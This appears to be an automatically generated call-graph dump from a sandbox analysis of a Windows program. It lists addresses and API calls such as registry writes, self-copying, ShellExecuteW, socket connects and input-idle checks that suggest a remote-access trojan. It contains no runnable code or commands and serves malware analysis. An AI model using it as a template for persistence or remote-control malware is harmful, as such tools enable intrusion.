87338->87340 87355 40e134 87338->87355 87339->87338 87978 4085b4 87339->87978 87347 40d95d 87340->87347 87342 40d912 87343 401eef 11 API calls 87342->87343 87344 40d91e 87343->87344 87345 401eea 11 API calls 87344->87345 87348 40d927 87345->87348 87346 40d9a4 87615 40bed7 87346->87615 87347->87346 87352 4124b7 3 API calls 87347->87352 87982 4124b7 RegOpenKeyExA 87348->87982 87350 40d9aa 87351 40d82d 87350->87351 87618 41a463 87350->87618 87351->87327 87357 40d988 87352->87357 88002 412902 30 API calls 87355->88002 87356 40d9c5 87358 40da18 87356->87358 87635 40697b 87356->87635 87357->87346 87985 412902 30 API calls 87357->87985 87360 401d64 28 API calls 87358->87360 87363 40da21 87360->87363 87372 40da32 87363->87372 87373 40da2d 87363->87373 87365 40e14a 88003 4112b5 64 API calls ___scrt_fastfail 87365->88003 87366 40d9e4 87986 40699d 30 API calls 87366->87986 87367 40d9ee 87371 401d64 28 API calls 87367->87371 87379 40d9f7 87371->87379 87377 401d64 28 API calls 87372->87377 87989 4069ba CreateProcessA CloseHandle CloseHandle ___scrt_fastfail 87373->87989 87374 40d9e9 87987 4064d0 97 API calls 87374->87987 87378 40da3b 87377->87378 87639 41ae08 87378->87639 87379->87358 87383 40da13 87379->87383 87381 40da46 87643 401e18 87381->87643 87988 4064d0 97 API calls 87383->87988 87384 40da51 87647 401e13 87384->87647 87387 40da5a 87388 401d64 28 API calls 87387->87388 87389 40da63 87388->87389 87390 401d64 28 API calls 87389->87390 87391 40da7d 87390->87391 87392 401d64 28 API calls 87391->87392 87393 40da97 87392->87393 87394 401d64 28 API calls 87393->87394 87396 40dab0 87394->87396 87395 40db1d 87398 40db2c 87395->87398 87403 40dcaa ___scrt_fastfail 87395->87403 87396->87395 87397 401d64 28 API calls 87396->87397 87401 40dac5 _wcslen 87397->87401 87399 401d64 28 API calls 87398->87399 87426 40dbac ___scrt_fastfail 87398->87426 87400 40db3e 87399->87400 87402 401d64 28 API calls 87400->87402 87401->87395 87405 401d64 28 API calls 87401->87405 87404 40db50 87402->87404 87991 41265d RegOpenKeyExA 87403->87991 87408 401d64 28 API calls 87404->87408 87406 40dae0 87405->87406 87409 401d64 28 API calls 87406->87409 87410 40db62 87408->87410 87411 40daf5 87409->87411 87413 401d64 28 API calls 87410->87413 87651 40c89e 87411->87651 87412 40dcef 87414 401d64 28 API calls 87412->87414 87416 40db8b 87413->87416 87417 40dd16 87414->87417 87422 401d64 28 API calls 87416->87422 87787 401f66 87417->87787 87419 401e18 11 API calls 87421 40db14 87419->87421 87424 401e13 11 API calls 87421->87424 87425 40db9c 87422->87425 87423 40dd25 87791 4126d2 RegCreateKeyA 87423->87791 87424->87395 87708 40bc67 87425->87708 87777 4128a2 87426->87777 87431 40dc45 ctype 87434 401d64 28 API calls 87431->87434 87432 401d64 28 API calls 87433 40dd47 87432->87433 87797 43a5e7 87433->87797 87435 40dc5c 87434->87435 87435->87412 87438 40dc70 87435->87438 87441 401d64 28 API calls 87438->87441 87439 40dd5e 87994 41beb0 87 API calls ___scrt_fastfail 87439->87994 87440 40dd81 87445 401f66 28 API calls 87440->87445 87442 40dc7e 87441->87442 87446 41ae08 28 API calls 87442->87446 87444 40dd65 CreateThread 87444->87440 88582 41c96f 10 API calls 87444->88582 87447 40dd96 87445->87447 87448 40dc87 87446->87448 87449 401f66 28 API calls 87447->87449 87990 40e219 112 API calls 87448->87990 87451 40dda5 87449->87451 87801 41a686 87451->87801 87452 40dc8c 87452->87412 87454 40dc93 87452->87454 87454->87351 87456 401d64 28 API calls 87457 40ddb6 87456->87457 87458 401d64 28 API calls 87457->87458 87459 40ddcb 87458->87459 87460 401d64 28 API calls 87459->87460 87461 40ddeb 87460->87461 87462 43a5e7 _strftime 39 API calls 87461->87462 87463 40ddf8 87462->87463 87464 401d64 28 API calls 87463->87464 87465 40de03 87464->87465 87466 401d64 28 API calls 87465->87466 87467 40de14 87466->87467 87468 401d64 28 API calls 87467->87468 87469 40de29 87468->87469 87470 401d64 28 API calls 87469->87470 87471 40de3a 87470->87471 87472 40de41 StrToIntA 87471->87472 87825 409517 87472->87825 87475 401d64 28 API calls 87476 40de5c 87475->87476 87477 40dea1 87476->87477 87478 40de68 87476->87478 87481 401d64 28 API calls 87477->87481 87995 43360d 22 API calls 3 library calls 87478->87995 87480 40de71 87482 401d64 28 API calls 87480->87482 87483 40deb1 87481->87483 87484 40de84 87482->87484 87486 40def9 87483->87486 87487 40debd 87483->87487 87485 40de8b CreateThread 87484->87485 87485->87477 88585 419128 109 API calls 2 library calls 87485->88585 87488 401d64 28 API calls 87486->87488 87996 43360d 22 API calls 3 library calls 87487->87996 87490 40df02 87488->87490 87494 40df6c 87490->87494 87495 40df0e 87490->87495 87491 40dec6 87492 401d64 28 API calls 87491->87492 87493 40ded8 87492->87493 87496 40dedf CreateThread 87493->87496 87497 401d64 28 API calls 87494->87497 87498 401d64 28 API calls 87495->87498 87496->87486 88584 419128 109 API calls 2 library calls 87496->88584 87499 40df75 87497->87499 87500 40df1e 87498->87500 87501 40df81 87499->87501 87502 40dfba 87499->87502 87503 401d64 28 API calls 87500->87503 87505 401d64 28 API calls 87501->87505 87850 41a7a2 GetComputerNameExW GetUserNameW 87502->87850 87506 40df33 87503->87506 87508 40df8a 87505->87508 87997 40c854 32 API calls 87506->87997 87512 401d64 28 API calls 87508->87512 87509 401e18 11 API calls 87511 40dfce 87509->87511 87514 401e13 11 API calls 87511->87514 87515 40df9f 87512->87515 87513 40df46 87516 401e18 11 API calls 87513->87516 87517 40dfd7 87514->87517 87526 43a5e7 _strftime 39 API calls 87515->87526 87518 40df52 87516->87518 87519 40dfe0 SetProcessDEPPolicy 87517->87519 87520 40dfe3 CreateThread 87517->87520 87523 401e13 11 API calls 87518->87523 87519->87520 87521 40e004 87520->87521 87522 40dff8 CreateThread 87520->87522 88553 40e54f 87520->88553 87524 40e019 87521->87524 87525 40e00d CreateThread 87521->87525 87522->87521 88580 410f36 139 API calls 87522->88580 87527 40df5b CreateThread 87523->87527 87529 40e073 87524->87529 87531 401f66 28 API calls 87524->87531 87525->87524 88581 411524 38 API calls ___scrt_fastfail 87525->88581 87528 40dfac 87526->87528 87527->87494 88583 40196b 49 API calls _strftime 87527->88583 87998 40b95c 7 API calls 87528->87998 87861 41246e RegOpenKeyExA 87529->87861 87532 40e046 87531->87532 87999 404c9e 28 API calls 87532->87999 87536 40e053 87538 401f66 28 API calls 87536->87538 87537 40e12a 87873 40cbac 87537->87873 87541 40e062 87538->87541 87540 41ae08 28 API calls 87543 40e0a4 87540->87543 87544 41a686 79 API calls 87541->87544 87864 412584 RegOpenKeyExW 87543->87864 87545 40e067 87544->87545 87547 401eea 11 API calls 87545->87547 87547->87529 87550 401e13 11 API calls 87553 40e0c5 87550->87553 87551 40e0ed DeleteFileW 87552 40e0f4 87551->87552 87551->87553 87555 41ae08 28 API calls 87552->87555 87553->87551 87553->87552 87554 40e0db Sleep 87553->87554 88000 401e07 87554->88000 87557 40e104 87555->87557 87869 41297a RegOpenKeyExW 87557->87869 87559 40e117 87560 401e13 11 API calls 87559->87560 87561 40e121 87560->87561 87562 401e13 11 API calls 87561->87562 87562->87537 87563->87252 87564->87248 87565->87256 87566->87265 87567->87267 87568->87270 87569->87245 87570->87249 87571->87253 87572->87274 87573->87276 87574->87279 87575->87277 87577 433c71 GetStartupInfoW 87576->87577 87577->87285 87579 44dddb 87578->87579 87580 44ddd2 87578->87580 87579->87289 87583 44dcc8 48 API calls 4 library calls 87580->87583 87582->87289 87583->87579 87585 41bd22 LoadLibraryA GetProcAddress 87584->87585 87586 41bd12 GetModuleHandleA GetProcAddress 87584->87586 87587 41bd4b 32 API calls 87585->87587 87588 41bd3b LoadLibraryA GetProcAddress 87585->87588 87586->87585 87587->87293 87588->87587 88004 41a63f FindResourceA 87589->88004 87592 43a88c ___std_exception_copy 21 API calls 87593 40e192 ctype 87592->87593 87594 401f86 28 API calls 87593->87594 87595 40e1ad 87594->87595 87596 401eef 11 API calls 87595->87596 87597 40e1b8 87596->87597 87598 401eea 11 API calls 87597->87598 87599 40e1c1 87598->87599 87600 43a88c ___std_exception_copy 21 API calls 87599->87600 87601 40e1d2 ctype 87600->87601 88007 406052 87601->88007 87603 40e205 87603->87295 87605 40e8ca 87604->87605 87607 40e8da 87605->87607 88010 40200a 11 API calls 87605->88010 87607->87303 87609 404ccb 87608->87609 88011 402e78 87609->88011 87611 404cee 87611->87317 88020 404bc4 87612->88020 87614 405cf4 87614->87320 88029 401e8f 87615->88029 87617 40bee1 CreateMutexA GetLastError 87617->87350 88031 41b15b 87618->88031 87620 41a471 88035 412513 RegOpenKeyExA 87620->88035 87623 401eef 11 API calls 87624 41a49f 87623->87624 87625 401eea 11 API calls 87624->87625 87626 41a4a7 87625->87626 87627 41a4fa 87626->87627 87628 412513 31 API calls 87626->87628 87627->87356 87629 41a4cd 87628->87629 87630 41a4d8 StrToIntA 87629->87630 87631 41a4ef 87630->87631 87632 41a4e6 87630->87632 87634 401eea 11 API calls 87631->87634 88040 41c102 22 API calls 87632->88040 87634->87627 87636 40698f 87635->87636 87637 4124b7 3 API calls 87636->87637 87638 406996 87637->87638 87638->87366 87638->87367 87640 41ae1c 87639->87640 88041 40b027 87640->88041 87642 41ae24 87642->87381 87644 401e27 87643->87644 87646 401e33 87644->87646 88050 402121 11 API calls 87644->88050 87646->87384 87649 402121 87647->87649 87648 402150 87648->87387 87649->87648 88051 402718 11 API calls _Deallocate 87649->88051 87652 40c8ba 87651->87652 87653 40c8da 87652->87653 87654 40c90f 87652->87654 87656 40c8d0 87652->87656 88056 41a74b 29 API calls 87653->88056 87657 41b15b 2 API calls 87654->87657 87655 40ca03 GetLongPathNameW 88052 403b40 87655->88052 87656->87655 87660 40c914 87657->87660 87663 40c918 87660->87663 87664 40c96a 87660->87664 87661 40c8e3 87665 401e18 11 API calls 87661->87665 87668 403b40 28 API calls 87663->87668 87667 403b40 28 API calls 87664->87667 87669 40c8ed 87665->87669 87666 403b40 28 API calls 87670 40ca27 87666->87670 87671 40c978 87667->87671 87672 40c926 87668->87672 87673 401e13 11 API calls 87669->87673 88059 40cc37 28 API calls 87670->88059 87677 403b40 28 API calls 87671->87677 87678 403b40 28 API calls 87672->87678 87673->87656 87675 40ca3a 88060 402860 28 API calls 87675->88060 87680 40c98e 87677->87680 87681 40c93c 87678->87681 87679 40ca45 88061 402860 28 API calls 87679->88061 88058 402860 28 API calls 87680->88058 88057 402860 28 API calls 87681->88057 87685 40c947 87689 401e18 11 API calls 87685->87689 87686 40ca4f 87690 401e13 11 API calls 87686->87690 87687 40c999 87688 401e18 11 API calls 87687->87688 87691 40c9a4 87688->87691 87692 40c952 87689->87692 87693 40ca59 87690->87693 87695 401e13 11 API calls 87691->87695 87696 401e13 11 API calls 87692->87696 87694 401e13 11 API calls 87693->87694 87697 40ca62 87694->87697 87698 40c9ad 87695->87698 87699 40c95b 87696->87699 87700 401e13 11 API calls 87697->87700 87701 401e13 11 API calls 87698->87701 87702 401e13 11 API calls 87699->87702 87703 40ca6b 87700->87703 87701->87669 87702->87669 87704 401e13 11 API calls 87703->87704 87705 40ca74 87704->87705 87706 401e13 11 API calls 87705->87706 87707 40ca7d 87706->87707 87707->87419 87709 40bc7a _wcslen 87708->87709 87710 40bc84 87709->87710 87711 40bcce 87709->87711 87714 40bc8d CreateDirectoryW 87710->87714 87712 40c89e 32 API calls 87711->87712 87713 40bce0 87712->87713 87715 401e18 11 API calls 87713->87715 88071 40856b 87714->88071 87717 40bccc 87715->87717 87719 401e13 11 API calls 87717->87719 87718 40bca9 88101 4028cf 87718->88101 87725 40bcf7 87719->87725 87721 40bcb5 87722 401e18 11 API calls 87721->87722 87723 40bcc3 87722->87723 87724 401e13 11 API calls 87723->87724 87724->87717 87726 40bd10 87725->87726 87727 40bd2d 87725->87727 88075 40bb7b 87726->88075 87728 40bd36 CopyFileW 87727->87728 87730 40be07 87728->87730 87732 40bd48 _wcslen 87728->87732 87733 40bb7b 31 API calls 87730->87733 87731 40bd21 87731->87426 87732->87730 87734 40bd64 87732->87734 87735 40bdb7 87732->87735 87736 40be18 87733->87736 87737 40c89e 32 API calls 87734->87737 87738 40c89e 32 API calls 87735->87738 87739 40be4d 87736->87739 87743 40be2a SetFileAttributesW 87736->87743 87742 40bd6a 87737->87742 87741 40bdbd 87738->87741 87740 40be95 CloseHandle 87739->87740 87745 403b40 28 API calls 87739->87745 87744 401e07 87740->87744 87747 401e18 11 API calls 87741->87747 87746 401e18 11 API calls 87742->87746 87757 40be39 _wcslen 87743->87757 87749 40beb1 ShellExecuteW 87744->87749 87750 40be63 87745->87750 87748 40bd76 87746->87748 87776 40bdb1 87747->87776 87751 401e13 11 API calls 87748->87751 87752 40bec4 87749->87752 87753 40bece ExitProcess 87749->87753 87754 41ae08 28 API calls 87750->87754 87756 40bd7f 87751->87756 87758 40bed7 2 API calls 87752->87758 87759 40be76 87754->87759 87755 401e13 11 API calls 87761 40bdcf 87755->87761 87760 40856b 28 API calls 87756->87760 87757->87739 87763 40be4a SetFileAttributesW 87757->87763 87773 40bdf8 87758->87773 88104 412774 RegCreateKeyW 87759->88104 87762 40bd93 87760->87762 87765 40bddb CreateDirectoryW 87761->87765 87764 4028cf 28 API calls 87762->87764 87763->87739 87769 40bd9f 87764->87769 87768 401e07 87765->87768 87772 40bdeb CopyFileW 87768->87772 87771 401e18 11 API calls 87769->87771 87770 401e13 11 API calls 87770->87740 87774 40bda8 87771->87774 87772->87730 87772->87773 87773->87731 87775 401e13 11 API calls 87774->87775 87775->87776 87776->87755 87778 4128c0 87777->87778 87779 406052 28 API calls 87778->87779 87780 4128d5 87779->87780 87781 401fbd 28 API calls 87780->87781 87782 4128e5 87781->87782 87783 4126d2 14 API calls 87782->87783 87784 4128ef 87783->87784 87785 401eea 11 API calls 87784->87785 87786 4128fc 87785->87786 87786->87431 87788 401f6e 87787->87788 88132 402301 87788->88132 87792 412722 87791->87792 87795 4126eb 87791->87795 87793 401eea 11 API calls 87792->87793 87794 40dd3b 87793->87794 87794->87432 87796 4126fd RegSetValueExA RegCloseKey 87795->87796 87796->87792 87798 43a600 _strftime 87797->87798 88136 43993e 87798->88136 87800 40dd54 87800->87439 87800->87440 87802 41a737 87801->87802 87803 41a69c GetLocalTime 87801->87803 87805 401eea 11 API calls 87802->87805 87804 404cbf 28 API calls 87803->87804 87806 41a6de 87804->87806 87807 41a73f 87805->87807 87808 405ce6 28 API calls 87806->87808 87809 401eea 11 API calls 87807->87809 87810 41a6ea 87808->87810 87811 40ddaa 87809->87811 88164 4027cb 87810->88164 87811->87456 87813 41a6f6 87814 405ce6 28 API calls 87813->87814 87815 41a702 87814->87815 88167 406478 76 API calls 87815->88167 87817 41a710 87818 401eea 11 API calls 87817->87818 87819 41a71c 87818->87819 87820 401eea 11 API calls 87819->87820 87821 41a725 87820->87821 87822 401eea 11 API calls 87821->87822 87823 41a72e 87822->87823 87824 401eea 11 API calls 87823->87824 87824->87802 87826 409536 _wcslen 87825->87826 87827 409541 87826->87827 87828 409558 87826->87828 87830 40c89e 32 API calls 87827->87830 87829 40c89e 32 API calls 87828->87829 87831 409560 87829->87831 87832 409549 87830->87832 87833 401e18 11 API calls 87831->87833 87834 401e18 11 API calls 87832->87834 87835 40956e 87833->87835 87849 409553 87834->87849 87836 401e13 11 API calls 87835->87836 87838 409576 87836->87838 87837 401e13 11 API calls 87839 4095ad 87837->87839 87840 40856b 28 API calls 87838->87840 88172 409837 87839->88172 87842 409588 87840->87842 87844 4028cf 28 API calls 87842->87844 87845 409593 87844->87845 87846 401e18 11 API calls 87845->87846 87847 40959d 87846->87847 87848 401e13 11 API calls 87847->87848 87848->87849 87849->87837 87851 403b40 28 API calls 87850->87851 87852 41a7f1 87851->87852 88201 403cbb 87852->88201 87854 41a7fd 87855 4028cf 28 API calls 87854->87855 87856 41a807 87855->87856 87857 401e13 11 API calls 87856->87857 87858 41a810 87857->87858 87859 401e13 11 API calls 87858->87859 87860 40dfc3 87859->87860 87860->87509 87862 40e08b 87861->87862 87863 41248f RegQueryValueExA RegCloseKey 87861->87863 87862->87537 87862->87540 87863->87862 87865 4125b0 RegQueryValueExW RegCloseKey 87864->87865 87866 4125dd 87864->87866 87865->87866 87867 403b40 28 API calls 87866->87867 87868 40e0ba 87867->87868 87868->87550 87870 412992 RegDeleteValueW 87869->87870 87871 4129a6 87869->87871 87870->87871 87872 4129a2 87870->87872 87871->87559 87872->87559 87874 40cbc5 87873->87874 87875 41246e 3 API calls 87874->87875 87876 40cbcc 87875->87876 87880 40cbeb 87876->87880 88215 401602 87876->88215 87878 40cbd9 88218 4127d5 RegCreateKeyA 87878->88218 87881 413fd4 87880->87881 87882 413feb 87881->87882 88232 41aa73 87882->88232 87884 413ff6 87885 401d64 28 API calls 87884->87885 87886 41400f 87885->87886 87887 43a5e7 _strftime 39 API calls 87886->87887 87888 41401c 87887->87888 87889 414021 Sleep 87888->87889 87890 41402e 87888->87890 87889->87890 87891 401f66 28 API calls 87890->87891 87892 41403d 87891->87892 87893 401d64 28 API calls 87892->87893 87894 41404b 87893->87894 87895 401fbd 28 API calls 87894->87895 87896 414053 87895->87896 87897 41afc3 28 API calls 87896->87897 87898 41405b 87897->87898 88236 404262 WSAStartup 87898->88236 87900 414065 87901 401d64 28 API calls 87900->87901 87902 41406e 87901->87902 87903 401d64 28 API calls 87902->87903 87946 4140ed 87902->87946 87904 414087 87903->87904 87905 401d64 28 API calls 87904->87905 87906 414098 87905->87906 87908 401d64 28 API calls 87906->87908 87907 41afc3 28 API calls 87907->87946 87909 4140a9 87908->87909 87911 401d64 28 API calls 87909->87911 87910 4085b4 28 API calls 87910->87946 87912 4140ba 87911->87912 87913 401d64 28 API calls 87912->87913 87915 4140cb 87913->87915 87914 401eef 11 API calls 87914->87946 87916 401d64 28 API calls 87915->87916 87917 4140dd 87916->87917 88379 404101 88 API calls 87917->88379 87919 4027cb 28 API calls 87919->87946 87920 401f66 28 API calls 87920->87946 87921 41a686 79 API calls 87921->87946 87923 414244 WSAGetLastError 88380 41bc76 30 API calls 87923->88380 87928 401f66 28 API calls 87937 414259 87928->87937 87931 401eea 11 API calls 87931->87937 87932 401d64 28 API calls 87932->87946 87933 404cbf 28 API calls 87933->87946 87934 401d8c 11 API calls 87934->87937 87935 401d64 28 API calls 87935->87937 87936 405ce6 28 API calls 87936->87946 87937->87928 87937->87931 87937->87934 87937->87935 87938 43a5e7 _strftime 39 API calls 87937->87938 87937->87946 87972 41a686 79 API calls 87937->87972 87973 414b22 CreateThread 87937->87973 87974 401e13 11 API calls 87937->87974 88381 404c9e 28 API calls 87937->88381 88383 40a767 84 API calls 87937->88383 88384 4047eb 98 API calls 87937->88384 87939 414b80 Sleep 87938->87939 87939->87937 87940 401eea 11 API calls 87940->87946 87943 4082dc 28 API calls 87943->87946 87945 401fbd 28 API calls 87945->87946 87946->87907 87946->87910 87946->87914 87946->87919 87946->87920 87946->87921 87946->87923 87946->87932 87946->87933 87946->87936 87946->87937 87946->87940 87946->87943 87946->87945 87947 41265d 3 API calls 87946->87947 87948 412513 31 API calls 87946->87948 87949 403b40 28 API calls 87946->87949 87954 401d64 28 API calls 87946->87954 88237 413f9a 87946->88237 88243 4041f1 87946->88243 88250 404915 87946->88250 88265 40428c connect 87946->88265 88325 41a96d 87946->88325 88328 413683 87946->88328 88331 440c51 87946->88331 88335 40cbf1 87946->88335 88341 41adee 87946->88341 88344 41aec8 87946->88344 88348 41ad46 87946->88348 87947->87946 87948->87946 87949->87946 87955 4144ed GetTickCount 87954->87955 87956 41ad46 28 API calls 87955->87956 87967 414507 87956->87967 87958 41ad46 28 API calls 87958->87967 87960 41aec8 28 API calls 87960->87967 87963 405ce6 28 API calls 87963->87967 87964 4027cb 28 API calls 87964->87967 87965 40275c 28 API calls 87965->87967 87967->87958 87967->87960 87967->87963 87967->87964 87967->87965 87968 401eea 11 API calls 87967->87968 87969 401e13 11 API calls 87967->87969 88353 41aca0 GetLastInputInfo GetTickCount 87967->88353 88354 41ac52 87967->88354 88359 40e679 GetLocaleInfoA 87967->88359 88362 4027ec 28 API calls 87967->88362 88363 4045d5 87967->88363 88382 404468 61 API calls ctype 87967->88382 87968->87967 87969->87967 87972->87937 87973->87937 88552 419e89 104 API calls 87973->88552 87974->87937 87975->87310 87976->87321 87979 4085c0 87978->87979 87980 402e78 28 API calls 87979->87980 87981 4085e4 87980->87981 87981->87342 87983 4124e1 RegQueryValueExA RegCloseKey 87982->87983 87984 41250b 87982->87984 87983->87984 87984->87338 87985->87346 87986->87374 87987->87367 87988->87358 87989->87372 87990->87452 87992 412683 RegQueryValueExA RegCloseKey 87991->87992 87993 4126a7 87991->87993 87992->87993 87993->87412 87994->87444 87995->87480 87996->87491 87997->87513 87998->87502 87999->87536 88001 401e0c 88000->88001 88002->87365 88005 40e183 88004->88005 88006 41a65c LoadResource LockResource SizeofResource 88004->88006 88005->87592 88006->88005 88008 401f86 28 API calls 88007->88008 88009 406066 88008->88009 88009->87603 88010->87607 88012 402e85 88011->88012 88013 402ea9 88012->88013 88014 402e98 88012->88014 88016 402eae 88012->88016 88013->87611 88018 403445 28 API calls 88014->88018 88016->88013 88019 40225b 11 API calls 88016->88019 88018->88013 88019->88013 88021 404bd0 88020->88021 88024 40245c 88021->88024 88023 404be4 88023->87614 88025 402469 88024->88025 88027 402478 88025->88027 88028 402ad3 28 API calls 88025->88028 88027->88023 88028->88027 88030 401e94 88029->88030 88032 41b183 88031->88032 88033 41b168 GetCurrentProcess IsWow64Process 88031->88033 88032->87620 88033->88032 88034 41b17f 88033->88034 88034->87620 88036 412541 RegQueryValueExA RegCloseKey 88035->88036 88037 412569 88035->88037 88036->88037 88038 401f66 28 API calls 88037->88038 88039 41257e 88038->88039 88039->87623 88040->87631 88042 40b02f 88041->88042 88045 40b04b 88042->88045 88044 40b045 88044->87642 88046 40b055 88045->88046 88048 40b060 88046->88048 88049 40b138 28 API calls 88046->88049 88048->88044 88049->88048 88050->87646 88051->87648 88053 403b48 88052->88053 88062 403b7a 88053->88062 88056->87661 88057->87685 88058->87687 88059->87675 88060->87679 88061->87686 88063 403b86 88062->88063 88066 403b9e 88063->88066 88065 403b5a 88065->87666 88067 403ba8 88066->88067 88069 403bb3 88067->88069 88070 403cfd 28 API calls 88067->88070 88069->88065 88070->88069 88072 408577 88071->88072 88110 402ca8 88072->88110 88074 40859b 88074->87718 88076 40bba1 88075->88076 88077 40bbdd 88075->88077 88119 40b0dd 88076->88119 88080 40bc1e 88077->88080 88082 40b0dd 28 API calls 88077->88082 88079 40bbb3 88083 4028cf 28 API calls 88079->88083 88081 40bc5f 88080->88081 88084 40b0dd 28 API calls 88080->88084 88081->87731 88085 40bbf4 88082->88085 88086 40bbbd 88083->88086 88087 40bc35 88084->88087 88088 4028cf 28 API calls 88085->88088 88090 412774 14 API calls 88086->88090 88091 4028cf 28 API calls 88087->88091 88089 40bbfe 88088->88089 88092 412774 14 API calls 88089->88092 88093 40bbd1 88090->88093 88094 40bc3f 88091->88094 88095 40bc12 88092->88095 88096 401e13 11 API calls 88093->88096 88097 412774 14 API calls 88094->88097 88098 401e13 11 API calls 88095->88098 88096->88077 88099 40bc53 88097->88099 88098->88080 88100 401e13 11 API calls 88099->88100 88100->88081 88123 402d8b 88101->88123 88103 4028dd 88103->87721 88105 4127c6 88104->88105 88106 412789 88104->88106 88107 401e13 11 API calls 88105->88107 88109 4127a2 RegSetValueExW RegCloseKey 88106->88109 88108 40be89 88107->88108 88108->87770 88109->88105 88112 402cb5 88110->88112 88111 402cd9 88111->88074 88112->88111 88113 402cc8 88112->88113 88114 402cde 88112->88114 88117 403374 28 API calls 88113->88117 88114->88111 88118 402f21 11 API calls 88114->88118 88117->88111 88118->88111 88120 40b0e9 88119->88120 88121 402ca8 28 API calls 88120->88121 88122 40b10c 88121->88122 88122->88079 88124 402d97 88123->88124 88127 4030f7 88124->88127 88126 402dab 88126->88103 88128 403101 88127->88128 88130 403115 88128->88130 88131 4036c2 28 API calls 88128->88131 88130->88126 88131->88130 88133 40230d 88132->88133 88134 402325 28 API calls 88133->88134 88135 401f80 88134->88135 88135->87423 88152 43a545 88136->88152 88138 43998b 88158 4392de 35 API calls 3 library calls 88138->88158 88139 439950 88139->88138 88140 439965 88139->88140 88143 43996a __fread_nolock 88139->88143 88157 445354 20 API calls _free 88140->88157 88143->87800 88145 439997 88146 4399c6 88145->88146 88159 43a58a 39 API calls __Tolower 88145->88159 88147 439a32 88146->88147 88160 43a4f1 20 API calls 2 library calls 88146->88160 88161 43a4f1 20 API calls 2 library calls 88147->88161 88150 439af9 _strftime 88150->88143 88162 445354 20 API calls _free 88150->88162 88153 43a54a 88152->88153 88154 43a55d 88152->88154 88163 445354 20 API calls _free 88153->88163 88154->88139 88156 43a54f __fread_nolock 88156->88139 88157->88143 88158->88145 88159->88145 88160->88147 88161->88150 88162->88143 88163->88156 88168 401e9b 88164->88168 88166 4027d9 88166->87813 88167->87817 88169 401ea7 88168->88169 88170 40245c 28 API calls 88169->88170 88171 401eb9 88170->88171 88171->88166 88173 409855 88172->88173 88174 4124b7 3 API calls 88173->88174 88175 40985c 88174->88175 88176 409870 88175->88176 88177 40988a 88175->88177 88178 4095cf 88176->88178 88179 409875 88176->88179 88180 4082dc 28 API calls 88177->88180 88178->87475 88187 4082dc 88179->88187 88182 409898 88180->88182 88192 4098a5 85 API calls 88182->88192 88186 409888 88186->88178 88188 4082eb 88187->88188 88193 408431 88188->88193 88190 408309 88191 409959 29 API calls 88190->88191 88191->88186 88198 40999f 130 API calls 88191->88198 88192->88178 88199 4099b5 53 API calls 88192->88199 88200 4099a9 125 API calls 88192->88200 88195 40843d 88193->88195 88194 40845b 88194->88190 88195->88194 88197 402f0d 28 API calls 88195->88197 88197->88194 88204 403dc2 88201->88204 88203 403cc9 88203->87854 88205 403dce 88204->88205 88208 402ffd 88205->88208 88207 403de3 88207->88203 88209 40300e 88208->88209 88210 4032a4 22 API calls 88209->88210 88211 40301a 88210->88211 88213 40302e 88211->88213 88214 4035e8 28 API calls 88211->88214 88213->88207 88214->88213 88221 4395ba 88215->88221 88219 412814 88218->88219 88220 4127ed RegSetValueExA RegCloseKey 88218->88220 88219->87880 88220->88219 88224 43953b 88221->88224 88223 401608 88223->87878 88225 43954a 88224->88225 88226 43955e 88224->88226 88230 445354 20 API calls _free 88225->88230 88229 43954f __alldvrm __fread_nolock 88226->88229 88231 447601 11 API calls 2 library calls 88226->88231 88229->88223 88230->88229 88231->88229 88235 41aab9 ctype ___scrt_fastfail 88232->88235 88233 401f66 28 API calls 88234 41ab2e 88233->88234 88234->87884 88235->88233 88236->87900 88238 413fb3 WSASetLastError 88237->88238 88239 413fa9 88237->88239 88238->87946 88385 413e37 29 API calls ___std_exception_copy 88239->88385 88242 413fae 88242->88238 88244 404206 socket 88243->88244 88245 4041fd 88243->88245 88247 404220 88244->88247 88248 404224 CreateEventW 88244->88248 88386 404262 WSAStartup 88245->88386 88247->87946 88248->87946 88249 404202 88249->88244 88249->88247 88251 4049b1 88250->88251 88252 40492a 88250->88252 88251->87946 88253 404933 88252->88253 88254 404987 CreateEventA CreateThread 88252->88254 88255 404942 GetLocalTime 88252->88255 88253->88254 88254->88251 88388 404b1d 88254->88388 88256 41ad46 28 API calls 88255->88256 88257 40495b 88256->88257 88387 404c9e 28 API calls 88257->88387 88259 404968 88260 401f66 28 API calls 88259->88260 88261 404977 88260->88261 88262 41a686 79 API calls 88261->88262 88263 40497c 88262->88263 88264 401eea 11 API calls 88263->88264 88264->88254 88266 4043e1 88265->88266 88267 4042b3 88265->88267 88268 4043e7 WSAGetLastError 88266->88268 88269 404343 88266->88269 88267->88269 88271 404cbf 28 API calls 88267->88271 88289 4042e8 88267->88289 88268->88269 88270 4043f7 88268->88270 88269->87946 88272 4043fc 88270->88272 88277 4042f7 88270->88277 88274 4042d4 88271->88274 88397 41bc76 30 API calls 88272->88397 88278 401f66 28 API calls 88274->88278 88276 4042f0 88276->88277 88280 404306 88276->88280 88281 401f66 28 API calls 88277->88281 88283 4042e3 88278->88283 88279 40440b 88398 404c9e 28 API calls 88279->88398 88291 404315 88280->88291 88292 40434c 88280->88292 88282 404448 88281->88282 88285 401f66 28 API calls 88282->88285 88286 41a686 79 API calls 88283->88286 88288 404457 88285->88288 88286->88289 88287 404418 88290 401f66 28 API calls 88287->88290 88293 41a686 79 API calls 88288->88293 88392 420151 27 API calls 88289->88392 88294 404427 88290->88294 88296 401f66 28 API calls 88291->88296 88394 420f34 54 API calls 88292->88394 88293->88269 88297 41a686 79 API calls 88294->88297 88299 404324 88296->88299 88301 40442c 88297->88301 88298 404354 88302 404389 88298->88302 88303 404359 88298->88303 88300 401f66 28 API calls 88299->88300 88304 404333 88300->88304 88306 401eea 11 API calls 88301->88306 88396 4202ea 28 API calls 88302->88396 88307 401f66 28 API calls 88303->88307 88308 41a686 79 API calls 88304->88308 88306->88269 88310 404368 88307->88310 88311 404338 88308->88311 88309 404391 88312 4043be CreateEventW CreateEventW 88309->88312 88314 401f66 28 API calls 88309->88314 88313 401f66 28 API calls 88310->88313 88393 41dc15 RtlDeleteCriticalSection RtlEnterCriticalSection RtlLeaveCriticalSection 88311->88393 88312->88269 88315 404377 88313->88315 88317 4043a7 88314->88317 88318 41a686 79 API calls 88315->88318 88320 401f66 28 API calls 88317->88320 88319 40437c 88318->88319 88395 420592 52 API calls 88319->88395 88322 4043b6 88320->88322 88323 41a686 79 API calls 88322->88323 88324 4043bb 88323->88324 88324->88312 88399 41a945 GlobalMemoryStatusEx 88325->88399 88327 41a982 88327->87946 88400 413646 88328->88400 88332 440c5d 